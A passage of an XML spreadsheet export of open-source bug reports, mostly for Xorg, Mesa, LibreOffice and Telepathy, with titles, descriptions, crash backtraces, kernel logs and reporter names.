ELF     b7ed9000-b8014000       Deferred        libwine.so.1
ELF     b8015000-b8034000       Deferred        ld-linux.so.2
Threads:
process  tid      prio (all id:s are in hex)
00000008 (D) Z:\home\users\emes\.wine\drive_c\Program Files\Firaxis
Games\Sid Meier's Civilization 4\Beyond the Sword\Civ4BeyondSword.exe
       00000038    0
       00000037   -1
       00000036    0
       00000035   15
       00000034   15
       00000009    0 &lt;==
0000000e
       0000001c    0
       00000014    0
       00000010    0
       0000000f    0
00000011
       00000018    0
       00000017    0
       00000013    0
       00000012    0
00000019
       0000001d    0
       0000001b    0
       0000001a    0
0000001e
       0000001f    0
Backtrace:
=&gt;0 0xb774b594 drm_intel_bo_get_subdata+0x1d() in libdrm_intel.so.1 (0x0033f050)
 1 0xb779bc5b in i915_dri.so (+0x2bc5b) (0x0033f070)
 2 0xb77f0a30 _mesa_GetBufferSubDataARB+0x93() in i915_dri.so (0x0033f0b0)
 3 0xb7ab7d2b buffer_get_sysmem+0x9f() in wined3d (0x0033f0d0)
 4 0xb7ab9571 in wined3d (+0x29571) (0x0033f170)
 5 0xb7ad9607 device_stream_info_from_declaration+0x68f() in wined3d
(0x0033f230)
 6 0xb7b4169e in wined3d (+0xb169e) (0x0033f2c0)
 7 0xb7b0f73a in wined3d (+0x7f73a) (0x0033f2f0)
 8 0xb7ac1f39 ActivateContext+0x2a3() in wined3d (0x0033f3a0)
 9 0xb7af7167 drawPrimitive+0xe5() in wined3d (0x0033f750)
 10 0xb7acfa21 in wined3d (+0x3fa21) (0x0033f7b0)
 11 0xb7cc3af7 in d3d9 (+0x13af7) (0x0033f800)
 12 0x009a33fd in civ4beyondsword (+0x5a33fd) (0x1a1ffa50)
 13 0x00000000 (0x00ad63a8)
 14 0x009a4620 in civ4beyondsword (+0x5a4620) (0x009a68a0)
-------8&lt;--------
Setups tested:
wine-1.1.27 with Mesa-7.5
wine-1.1.29 with Mesa-7.5.1 (compiled with and without gallium support)</t>
  </si>
  <si>
    <t>XORG-22366</t>
  </si>
  <si>
    <t>[915] Freeze one minute after resuming from hibernation with KMS and UXA</t>
  </si>
  <si>
    <t>[This bug can be considered as the hibernation side of bug 20520 as requested to be opened).
I'm using driver 2.7.99.901+git20090611.6d062e9e with kernel 2.6.30 on Ubuntu Jaunty. My card is a 915GM/GMS/910GML Express Graphics Controller [8086:2592] (rev 03).
This freeze has appeared recently about a week or two ago. When I return from hibernation I get the freeze in about one minute without any other symptoms. I also get freezes on fresh boot but they take much longer to appear - I'll debug and report them separately with a link here in case they can be related.
Attached are the logs and batch buffer dumps. An interesting error shown next the end of dmesg is:
[ 2201.329557] cp: page allocation failure. order:8 mode:0x40d0
[ 2201.329566] Pid: 7847 comm: cp Tainted: G        W  2.6.30-020630-generic #020630
[ 2201.329569] Call Trace:
[ 2201.329586]  [] __alloc_pages_internal+0x353/0x450
[ 2201.329591]  [] __get_free_pages+0x1c/0x30
[ 2201.329598]  [] __kmalloc+0x100/0x1b0
[ 2201.329603]  [] ? free_compound_page+0x13/0x20
[ 2201.329608]  [] ? put_compound_page+0x1d/0x30
I'm not sure that's relevant at all but that seems worth to be  mentioned.
[ 2201.329612]  [] ? kfree+0xe9/0x100
[ 2201.329617]  [] seq_read+0x11d/0x330
[ 2201.329623]  [] vfs_read+0x94/0x160
[ 2201.329627]  [] ? seq_read+0x0/0x330
[ 2201.329631]  [] sys_read+0x3d/0x70
[ 2201.329637]  [] sysenter_do_call+0x12/0x28</t>
  </si>
  <si>
    <t>LIBREOFFICE-50843</t>
  </si>
  <si>
    <t>EDITING: cut &amp; paste/undo noworky</t>
  </si>
  <si>
    <t>Problem description:  cut &amp; paste string from one cell into new cell undo forgets to delete contents of new cell
Steps to reproduce:
1. type string into one cell
2. copy cell
3. paste into new cell two strings get placed into two cells.
Current behavior: copy &amp; paste work undo doesn't work
Expected behavior: undo undoes
Platform (if different from the browser): Win7
Browser: Mozilla/5.0 (Windows NT 6.1 WOW64 rv:12.0) Gecko/20100101 Firefox/12.0</t>
  </si>
  <si>
    <t>allen</t>
  </si>
  <si>
    <t>LIBREOFFICE-32826</t>
  </si>
  <si>
    <t>Printing in Preview mode causes all sheets to be printed</t>
  </si>
  <si>
    <t>Created attachment 41632
It happened with this test spreadsheet.  Seems reproducible
I have a document with multiple sheets.  If I view the sheet that I'm working on in Preview mode and hit the printer icon all sheets are printed.  If I close preview returning to the sheet in question hit the same print icon then it correctly (IMHO) prints only the sheet that is up.
Happens on both my Ubuntu 10.10 Laptop and my Windows 7 desktop
LibreOffice 3.3.0 
OOO330m18 (Build:4)
tag libreoffice-3.3.0.2</t>
  </si>
  <si>
    <t>TELEPATHY-36260</t>
  </si>
  <si>
    <t>Stop turning on Google Queue support based on google:roster</t>
  </si>
  <si>
    <t>q
Q
ctrl-q
ctrl-shift-q
alt-q
:wq
ctrl-x ctrl-c
esc
esc esc esc</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-105477</t>
  </si>
  <si>
    <t>address field accepting special characters</t>
  </si>
  <si>
    <t>Created attachment 138066
please verify the attachment
Steps to reproduce:
Step 1:Login to Bank V1
Step 2:Select Add new customer page
Step 3:Enter address field with special characters</t>
  </si>
  <si>
    <t>dilydas20</t>
  </si>
  <si>
    <t>LIBREOFFICE-44081</t>
  </si>
  <si>
    <t>EDITING - A form set to open in read-only mode can never be switched back</t>
  </si>
  <si>
    <t>Created attachment 54725
Demonstration of the bug preventing read-only forms from having the read-only setting turned off.
A Base form that has had the Open file read-only setting turned on and saved in a Base file can never be edited again.  The open file read-only setting can not be turned off again.
To reproduce:
1) Create a new LibreOffice Base database.
2) Create a form in the database.
3) While editing the form select File-&gt;Properties and click on the Security tab.  Check the Open file read-only checkbox and click Ok.
4) Save the form close it then save the Base file and close it.
From this point on if you open the Base file the form can never again be edited.
Normally in a Writer file (which is the closest analog to a Base form) the setting can be turned off by:
1) Clicking the Edit File button in the Standard toolbar
2) Selecting File-&gt;Properties clicking on the Security tab and unchecking Open file read-only
However in Base forms the Edit File button is always grayed.  And once the form is saved with the Open file read-only setting turned on the form always opens with design-mode turned off and the button to turn on design-mode also grayed.  Copying the form has no effect as the copy has the read-only setting turned on as well.
The attached database demonstrates.  There are two forms in it.  One that can be edited one that cannot be.</t>
  </si>
  <si>
    <t>kurt.fitzner</t>
  </si>
  <si>
    <t>POPPLER-31895</t>
  </si>
  <si>
    <t>Poppler should't call abort() on error</t>
  </si>
  <si>
    <t>Created attachment 40546
reproducer
Poppler calls abort() from OBJECT_TYPE_CHECK() and OBJECT_2TYPES_CHECK() if it doesn't get correct type.
The attached PDF makes poppler to crash because there are wrong values in BBox on line 3721. These values are stored as objError but getNum() expects objInt or objReal.
Simple fix could be change of these abort() to exit() (but still not optimal).
Marek
This was originally reported downstream here:
https://bugzilla.redhat.com/show_bug.cgi?id=625744</t>
  </si>
  <si>
    <t>MESA-8883</t>
  </si>
  <si>
    <t>glGetVertexAttribivARB(0 GL_VERTEX_ARRAY_TYPE ...) throws GL_INVALID_VALUE</t>
  </si>
  <si>
    <t>Line 104 of Mesa-6.5.1/src/mesa/shader/arbprogram.c has the following code
   if (index == 0 || index &gt;= MAX_VERTEX_PROGRAM_ATTRIBS) {
      _mesa_error(ctx GL_INVALID_VALUE glGetVertexAttribfvARB(index))
      return
   }
This causes it to fail for any queries on vertex attribute 0. However only
GL_CURRENT_VERTEX_ATTRIB is illegal for attribute 0.</t>
  </si>
  <si>
    <t>MESA-13507</t>
  </si>
  <si>
    <t>Intermittent GPU crashes with compiz</t>
  </si>
  <si>
    <t>Every few hours while running compiz the driver seems to generate an invalid operation or page table entry causing system lockup and screen corruption.</t>
  </si>
  <si>
    <t>GALAGO-5510</t>
  </si>
  <si>
    <t>notification shows partly off the screen when actions added</t>
  </si>
  <si>
    <t>If an action (or more) is added to the notification the notification is shown
partly off the screen when drawn without xy hints. I'm assuming that somewhere
the size of the notification widget is not being updated after the
notify_notification_add_action call and retains it's original size (the size
that it was created with when notify_notification_new was called) thus it's
placement is partly off the screen?</t>
  </si>
  <si>
    <t>mszilveszter</t>
  </si>
  <si>
    <t>DRI-2498</t>
  </si>
  <si>
    <t>x11-drm-20050104 borks on xorg startup</t>
  </si>
  <si>
    <t>Some time ago I decide to give a try to recent snapshot of DRM modules in my 
Gentoo installation. Generaly I was able to emerge and compile it without any 
problems but on first startup of Xorg (6.8.1.904) I get only a weird crash with 
following message in log's:
--------
Jan 22 23:47:31 pegasos kernel: radeon: Ignoring new-style parameters in 
presence of obsolete ones
Jan 22 23:47:31 pegasos kernel: [drm] Initialized radeon 1.13.0 20041207 on 
minor 0: ATI Technologies Inc Radeon RV250 If [Radeon 9000]
Jan 22 23:47:31 pegasos kernel: [drm] Used old pci detect: framebuffer loaded
Jan 22 23:47:42 pegasos kernel: Oops: kernel access of bad area sig: 11 [#1]
Jan 22 23:47:42 pegasos kernel: NIP: E2378438 LR: E23785D8 SP: CCAA9E40 REGS: 
ccaa9d90 TRAP: 0300    Not tainted
Jan 22 23:47:42 pegasos kernel: MSR: 00009032 EE: 1 PR: 0 FP: 0 ME: 1 IR/DR: 11
Jan 22 23:47:42 pegasos kernel: DAR: 0000003C DSISR: 40000000
Jan 22 23:47:42 pegasos kernel: TASK = df0be720[21951] 'X' THREAD: ccaa8000
Jan 22 23:47:42 pegasos kernel: Last syscall: 54
Jan 22 23:47:42 pegasos kernel: GPR00: E2495000 CCAA9E40 DF0BE720 E2D80000 
E2F7F000 DC24FEE0 00306400 00800000
Jan 22 23:47:42 pegasos kernel: GPR08: C4000000 E2300000 00000000 D49EE300 
88042444 102047D0 101A0000 101A0000
Jan 22 23:47:42 pegasos kernel: GPR16: 101A0000 10200000 10200000 107D5C4C 
7FFFF5E4 00000007 7FFFF170 DF681230
Jan 22 23:47:42 pegasos kernel: GPR24: D6F57180 E2390000 E2390000 CCAA9E50 
D49EE2A0 D49EE300 D6913000 DFB4E000
Jan 22 23:47:42 pegasos kernel: NIP [e2378438] radeon_cp_init+0x614/0x960 
[radeon]
Jan 22 23:47:42 pegasos kernel: LR [e23785d8] radeon_cp_init+0x7b4/0x960 
[radeon]
Jan 22 23:47:42 pegasos kernel: Call trace:
Jan 22 23:47:42 pegasos kernel: [e237178c] radeon_ioctl+0x194/0x1cc [radeon]
Jan 22 23:47:42 pegasos kernel: [c006ce24] sys_ioctl+0x2fc/0x498
Jan 22 23:47:42 pegasos kernel: [c0004400] ret_from_syscall+0x0/0x44
========
I am using the 2.6.10 kernel with following GFX card on my machine:
0001:01:08.0 VGA compatible controller: ATI Technologies Inc Radeon RV250 If 
[Radeon 9000] (rev 01) (prog-if 00 [VGA])
        Subsystem: Hightech Information System Ltd. RV250 If [Excalibur Radeon 
9000]
        Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping+ SERR- FastB2B-
        Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- 
SERR- &lt;PERR-
        Latency: 0 (2000ns min)
        Interrupt: pin A routed to IRQ 9
        Region 0: Memory at c0000000 (32-bit prefetchable)
        Region 1: I/O ports at ffff1000 [size=256]
        Region 2: Memory at c4000000 (32-bit non-prefetchable) [size=64K]
        Capabilities: [58] AGP version 2.0
                Status: RQ=48 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 
64bit- FW+ AGP3- Rate=x1x2
                Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP- GART64- 64bit- FW- 
Rate=
        Capabilities: [50] Power Management version 2
                Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-D1-D2-
D3hot-D3cold-)
                Status: D0 PME-Enable- DSel=0 DScale=0 PME-
The machine is a Pegasos2 computer with PPC CPU (1GHz G4)
I did some research to help resolve this problem ...
1) I can load the readeon module using modprobe command without any crash or 
something. It's loaded normaly. It seems starting Xorg cause this crash.
2) I can avoid this message by removing dri extension from Xorg configuration 
file. This means the problem is related to DRM module.
3) If I remove the BusType PCI option from Xorg configuration file I can load 
the X without this error (But without DRI too because there is no working 
AGPGart for this machine and Xorg disables DRI because of that in that case)
4) Not only I have some problems with this version of DRM. One of the Gentoo 
users reported a similar problem to my one (weird errors when loading Xorg but 
he can use DRI in the end I mean no crash on his system) He is using Pegasos2 
machine too but with R9200SE card.
drm] Initialized radeon 1.13.0 20041207 on minor 0: ATI Technologies Inc RV280 
[Radeon 9200 SE]
[drm] Used old pci detect: framebuffer loaded
[drm] Loading R200 Microcode
[drm:radeon_ati_pcigart_cleanup] *ERROR* no scatter/gather memory!
[drm:radeon_do_cleanup_cp] *ERROR* failed to cleanup PCI GART!
More log's and configuration files for both cases (My one and the 9200SE) can be 
found at http://bugs.gentoo.org/show_bug.cgi?id=79146
I can attach them here too if someone want me to.</t>
  </si>
  <si>
    <t>TANGO-11168</t>
  </si>
  <si>
    <t>Missing links to gtk-about and others</t>
  </si>
  <si>
    <t>In GNOME-Icon-Theme the newly introduced help-about icon needs to be linked to gtk-about.
Likewise a few other links need to be added for various icons to get 100%
compatibility with the names used in GTK+.
I have prepared a patch see attachment.</t>
  </si>
  <si>
    <t>TELEPATHY-69540</t>
  </si>
  <si>
    <t>Some misc 'next' tweaks</t>
  </si>
  <si>
    <t>Opening a bug to get review comments...</t>
  </si>
  <si>
    <t>XORG-66650</t>
  </si>
  <si>
    <t>[regression][NVD0] 'drm/nve0-/gr: some new gpc registers can have multiple copies' causes lockups</t>
  </si>
  <si>
    <t>Commit 5ee86c4190f9e in the current tree causes the card to switch to software fbcon but only after X is attempted to start.
[    0.291310] nouveau  [  DEVICE][0000:01:00.0] BOOT0  : 0x0d90a0a1
[    0.291314] nouveau  [  DEVICE][0000:01:00.0] Chipset: GF119 (NVD9)
[    0.291316] nouveau  [  DEVICE][0000:01:00.0] Family : NVD0
[    0.291907] nouveau  [   VBIOS][0000:01:00.0] checking PRAMIN for image...
[    0.365250] nouveau  [   VBIOS][0000:01:00.0] ... appears to be valid
[    0.365253] nouveau  [   VBIOS][0000:01:00.0] using image from PRAMIN
[    0.365455] nouveau  [   VBIOS][0000:01:00.0] BIT signature found
[    0.365459] nouveau  [   VBIOS][0000:01:00.0] version 75.19.55.00.02
[    0.365952] nouveau  [     PFB][0000:01:00.0] RAM type: DDR3
[    0.365955] nouveau  [     PFB][0000:01:00.0] RAM size: 1024 MiB
[    0.365957] nouveau  [     PFB][0000:01:00.0]    ZCOMP: 0 tags
[    0.388914] nouveau  [  PTHERM][0000:01:00.0] FAN control: PWM
[    0.388926] nouveau  [  PTHERM][0000:01:00.0] fan management: disabled
[    0.388931] nouveau  [  PTHERM][0000:01:00.0] internal sensor: yes
[    0.391354] [TTM] Zone  kernel: Available graphics memory: 1025312 kiB
[    0.391356] [TTM] Initializing pool allocator
[    0.391361] [TTM] Initializing DMA pool allocator
[    0.391601] nouveau  [     DRM] VRAM: 1024 MiB
[    0.391606] nouveau  [     DRM] GART: 1048576 MiB
[    0.391612] nouveau  [     DRM] TMDS table version 2.0
[    0.391614] nouveau  [     DRM] DCB version 4.0
[    0.391617] nouveau  [     DRM] DCB outp 00: 02000300 00000000
[    0.391620] nouveau  [     DRM] DCB outp 01: 01000302 00020030
[    0.391623] nouveau  [     DRM] DCB outp 02: 02011362 00020010
[    0.391625] nouveau  [     DRM] DCB outp 03: 04022310 00000000
[    0.391628] nouveau  [     DRM] DCB conn 00: 00001030
[    0.391630] nouveau  [     DRM] DCB conn 01: 00002161
[    0.391632] nouveau  [     DRM] DCB conn 02: 00000200
[    0.392747] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010).
[    0.392749] [drm] No driver support for vblank timestamp query.
[    0.392970] nouveau  [     DRM] 2 available performance level(s)
[    0.392975] nouveau  [     DRM] 1: core 270MHz shader 540MHz memory 405MHz voltage 900mV
[    0.392979] nouveau  [     DRM] 3: core 810MHz shader 1620MHz memory 500MHz voltage 1110mV
[    0.392983] nouveau  [     DRM] c: core 270MHz shader 540MHz memory 405MHz voltage 900mV fanspeed 40%
[    0.396289] nouveau  [     DRM] MM: using COPY0 for buffer copies
[    0.471886] nouveau  [     DRM] allocated 1280x1024 fb: 0x60000 bo ffff88007cfad000
[    0.471980] fbcon: nouveaufb (fb0) is primary device
A snippets of the logs while failing (taken from rsyslog):
06-07-2013 17:15 .err ::: nouveau E[     DRM] GPU lockup - switching to software fbcon
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .err ::: nouveau E[ X[2378]] failed to idle channel 0xcccc0001 [X[2378]]
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .err ::: nouveau E[ X[2378]] failed to idle channel 0xcccc0001 [X[2378]]
06-07-2013 17:15 .err ::: nouveau E[   PFIFO][0000:01:00.0] playlist update failed
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:15 .err ::: nouveau E[ X[2378]] failed to idle channel 0xcccc0000 [X[2378]]
06-07-2013 17:15 .err ::: nouveau E[ X[2378]] failed to idle channel 0xcccc0000 [X[2378]]
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000d
06-07-2013 17:15 .err ::: nouveau E[   PFIFO][0000:01:00.0] channel 1 [X[2378]] kick timeout
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000d
06-07-2013 17:15 .err ::: nouveau E[   PFIFO][0000:01:00.0] playlist update failed
06-07-2013 17:15 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000001: 0x0000000b
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:16 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a
06-07-2013 17:17 .warning ::: nouveau W[   PFIFO][0000:01:00.0] INTR 0x00000100: 0x0000000a</t>
  </si>
  <si>
    <t>XORG-29990</t>
  </si>
  <si>
    <t>Xorg unstable after update</t>
  </si>
  <si>
    <t>Since I have updated from Xorg 7.5_1.8.0-9-4 to Xorg 7.5_1.8.0-10.3.1 the X server always crashes after a short while of operation (text editing + console).
  However if I disable dri in xorg.conf everything works fine again. The backtrace looks like the following:
[  1414.242] 0: X (xorg_backtrace+0x28) [0x48daf8]
[  1414.242] 1: X (0x400000+0x6ae89) [0x46ae89]
[  1414.242] 2: /lib64/libc.so.6 (0x7f87c9a36000+0x32a60) [0x7f87c9a68a60]
[  1414.243] 3: X (dixLookupPrivate+0xa) [0x4263da]
[  1414.243] 4: /usr/lib64/xorg/modules/extensions/libglx.so (0x7f87c84bb000+0x41983) [0x7f87c84fc983]
[  1414.243] 5: /usr/lib64/xorg/modules/extensions/libglx.so (0x7f87c84bb000+0x38a6f) [0x7f87c84f3a6f]
[  1414.243] 6: X (FreeResource+0x12b) [0x43995b]
[  1414.243] 7: /usr/lib64/xorg/modules/extensions/libglx.so (0x7f87c84bb000+0x34479) [0x7f87c84ef479]
[  1414.243] 8: /usr/lib64/xorg/modules/extensions/libglx.so (0x7f87c84bb000+0x38853) [0x7f87c84f3853]
[  1414.243] 9: X (0x400000+0x40b6c) [0x440b6c]
[  1414.243] 10: X (0x400000+0x25f3a) [0x425f3a]
[  1414.243] 11: /lib64/libc.so.6 (__libc_start_main+0xfd) [0x7f87c9a54b7d]
[  1414.243] 12: X (0x400000+0x25af9) [0x425af9]
[  1414.243] Segmentation fault at address 0x290</t>
  </si>
  <si>
    <t>XORG-14060</t>
  </si>
  <si>
    <t>Server fails to start with randr 1.2 and a NV20</t>
  </si>
  <si>
    <t>Created attachment 13699
Xorg.0.log with randr 1.2 enabled
Xorg fails to start with the following error:
(EE) NOUVEAU(0): 1484: No valid modes.
(EE) Screen(s) found but none have a usable configuration.
if randr 1.2 is enabled
Logs also report unknown DCB 1.4 / 1.5 entry.</t>
  </si>
  <si>
    <t>XORG-5116</t>
  </si>
  <si>
    <t>README.DRI referenced by xorg.conf man page</t>
  </si>
  <si>
    <t>It's old and dated and probably wrong.  Should just nuke the reference and
either document things correctly or point to dri.fd.o.</t>
  </si>
  <si>
    <t>XORG-10418</t>
  </si>
  <si>
    <t>Powerbook DVI out only works when booted with monitor attached</t>
  </si>
  <si>
    <t>When playing with the latest git of the radeon driver i suddenly got my 
DVI out to work! (which i never could get before).. 
Unfortunately it only works if the monitor was attached during bootup as openfirmware does some initialisation that xorg apparently doesn't.. When i start
X when the monitor is attached after bootup X thinks it's there but the monitor doesn't detect any input :( 
This is on a Powerbook G4 (PowerBook52) with an ATI Technologies Inc RV350 [Mobility Radeon 9600 M10] video card.
I'll attach the logs of both booting with working and non-working dvi output.</t>
  </si>
  <si>
    <t>LIBREOFFICE-53692</t>
  </si>
  <si>
    <t>: Crasher when clicking on a button inside an .ods spreadsheet file with macros</t>
  </si>
  <si>
    <t>Created attachment 65749
Screenshot of the spreadsheet file. The button which causes the crash is highlighted.
Problem description: 
Reproducible crasher when clicking on a button inside an .ods spreadsheet file with macros.
The file is called RechnungEasyDS-OOo-3.0.ods and can be downloaded under the following link: http://www.swierkowski-online.de/RechnungEasyDS-OOo-3.0.ods
Steps to reproduce:
1. Enable macros
2. Open RechnungEasyDS-OOo-3.0.ods
3. Switch to tab Rechnung
4. Click on Formeln wiederherstellen
5. LibO crashes
Current behavior:
Crash
Expected behavior:
Execution of macro (restoring of formulas)
Platform:
Windows 7 SP1 64bit
Further information:
The crash is also reproducible in LibO 3.6-final. Since I do not have any debug-versions of 3.6.1 RC1 on my machine I wasn't able to extract any further information via WinDbg.</t>
  </si>
  <si>
    <t>hg.weinreich</t>
  </si>
  <si>
    <t>TELEPATHY-30000</t>
  </si>
  <si>
    <t>Implement final version of SucceededWithChannel CreateChannelWithHints etc.</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #28866 +++
See that bug for initial discussion.</t>
  </si>
  <si>
    <t>XORG-1080</t>
  </si>
  <si>
    <t>Composite doesn't survive x11perf</t>
  </si>
  <si>
    <t>running x11perf with xcompmgr running makes server go boom.</t>
  </si>
  <si>
    <t>DBUS-73689</t>
  </si>
  <si>
    <t>fix and enable test-dbus test-bus test-bus-system under CMake</t>
  </si>
  <si>
    <t>Running dbus unit test crashes on linux and windows regardless of the buildsystem 
make check
... 
test-dbus: checking for memleaks
test-dbus: running memory tests
test-dbus: checking for memleaks
test-dbus: running mem-pool tests
test-dbus: checking for memleaks
test-dbus: running list tests
test-dbus: checking for memleaks
test-dbus: running marshal-validate tests
test-dbus: checking for memleaks
test-dbus: running message tests
/bin/sh: line 5:  2106 Speicherzugriffsfehler  XDG_RUNTIME_DIR=/home/xxx/src/dbus-autotools-build/test/XDG_RUNTIME_DIR DBUS_FATAL_WARNINGS=1 DBUS_TEST_DAEMON=/home/xxx/src/dbus-autotools-build/bus/dbus-daemon DBUS_TEST_DATA=/home/xxx/src/dbus-autotools-build/test/data DBUS_TEST_HOMEDIR=/home/xxx/src/dbus-autotools-build/dbus ${dir}$tst
FAIL: ../dbus/test-dbus</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-30394</t>
  </si>
  <si>
    <t>Request for account for libreoffice</t>
  </si>
  <si>
    <t>Created attachment 38979
GPG public key 
# real name: CaolÃ¡n McNamara
# email address: caolan@redhat.com
# preferred account name: caolan</t>
  </si>
  <si>
    <t>XORG-2597</t>
  </si>
  <si>
    <t>Dual Head broken</t>
  </si>
  <si>
    <t>I'm trying to get X working with 2 video cards - the builtin graphics (Intel
845G chipset) using the i810 driver and a pci Nvidia GeForce4 MX 4000 using the
Nvidia 6629 driver.  I'm using kernel 2.6.10 X.org 6.8.1.  When I boot the
machine the BIOS has an option to select whether the primary graphics should be
AGP or PCI. When I set it to AGP I can start X on the Intel graphics but when
I try the Nvidia the X server crashes.  When I set the primary graphics
device to PCI X will start on the Nvidia card but I get these errors
when I try to start it on the Intel:
(EE) I810(0): Cannot read V_BIOS
(EE) I810(0): VBE initialization failed.
I've tried running both X servers separately and together - same
results.  I've also tried the NoInt10 option for the i810 driver but it
still won't start.  I think X is always querying the BIOS for
information about the video card and the BIOS returns info for whatever
card is set as the primary regardless of which one X is set to use.
Here are the config files I'm using:
X only on i810:
http://home.nc.rr.com/webstorage/xorg.conf.intel
X only on nvidia:
http://home.nc.rr.com/webstorage/xorg.conf.nvidia.monitor
X on both:
http://home.nc.rr.com/webstorage/xorg.conf.multihead
Here are the logs from when I try to start the X server:
X on i810 bios set to AGP works:
http://home.nc.rr.com/webstorage/Xorg.0.log.i810oni810b
X on i810 bios set to PCI X won't start:
http://home.nc.rr.com/webstorage/Xorg.0.log.i810onnvb
X on nvidia bios set to AGP X crashes:
http://home.nc.rr.com/webstorage/Xorg.0.log.nvoni810b
X on nvidia bios set to PCI works:
http://home.nc.rr.com/webstorage/Xorg.0.log.nvonnvb
I also tried the vesa driver but it says that it can't find a device
matching the device id I put in the config file.</t>
  </si>
  <si>
    <t>tahoward</t>
  </si>
  <si>
    <t>CAIROMM-91728</t>
  </si>
  <si>
    <t>bug1</t>
  </si>
  <si>
    <t>bug:conmpiler issue</t>
  </si>
  <si>
    <t>nidhics2003</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-1277</t>
  </si>
  <si>
    <t>Japanese Translation for shared-mime-info-0.15.pot (NOT a bug)</t>
  </si>
  <si>
    <t>Hello 
I've translated ja.po for shared-mime-info (0.15).
The file is
http://bonobo.gnome.gr.jp/~ss/t/shared-mime-info-0.15.ja.po.bz2
and could you please commit this?
Thanks
Satoru SATOH</t>
  </si>
  <si>
    <t>ss</t>
  </si>
  <si>
    <t>LIBBSD-66679</t>
  </si>
  <si>
    <t>libbsd-0.5.2 segfault in spt_copyenv()</t>
  </si>
  <si>
    <t>libbsd-0.5.2 is crashing in setproctitle on Fedora 19 this time with claws-mail by way of libnss.  This may be due to the use of _dl_open() to load libnss_wins.so.2.  I haven't had time to dig into this any further.  I'm tempted to simply make setproctitle do nothing.
Here's the Fedora bug:
https://bugzilla.redhat.com/show_bug.cgi?id=981799</t>
  </si>
  <si>
    <t>brouhaha</t>
  </si>
  <si>
    <t>XORG-24527</t>
  </si>
  <si>
    <t>double mouse pointer effect after resume from s2disk</t>
  </si>
  <si>
